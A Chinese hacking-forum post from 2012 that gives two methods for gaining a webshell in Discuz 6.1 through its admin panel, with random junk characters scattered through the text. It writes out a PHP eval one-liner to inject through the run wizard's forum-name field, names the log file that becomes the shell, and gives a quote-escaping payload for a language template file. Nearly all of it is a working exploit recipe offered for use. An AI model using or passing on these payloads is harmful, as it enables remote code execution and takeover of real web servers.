discuz6.1两种方法后台拿shell$ t4 g; L: k5 v8 I3 L& E4 Y8 i
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下+ T, K9 V7 m( ~2 E+ e6 _
1:4 H) {+ e, r! d @8 [! S
http://127.0.0.1/discuz/admincp. ... zard&frames=yes8 p4 t' y3 C6 @7 ~; V6 s6 _* ~
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
6 e+ q& ?1 \7 N# J- q' A# H- N<?php eval($_POST[cmd]);?>5 z3 o7 n \, P6 |# c. U U
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
1 F8 [! A% c7 Z
$ t. }* p {( l, P- }: S4 E# ^4 H7 i, ]5 y. D/ a
2:后台模板管理--默认模板套系--详情" d8 q2 _% x+ S, u
templates/default/actions.lang.php. x5 [& N* Q0 |; ]: \. b2 N; G
jhackj\\');eval($_POST[cmd])?>;//
, ?9 m# j: C3 G. d5 c0 u+ g) h; k, t$ f- i- ?- d, d/ d
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对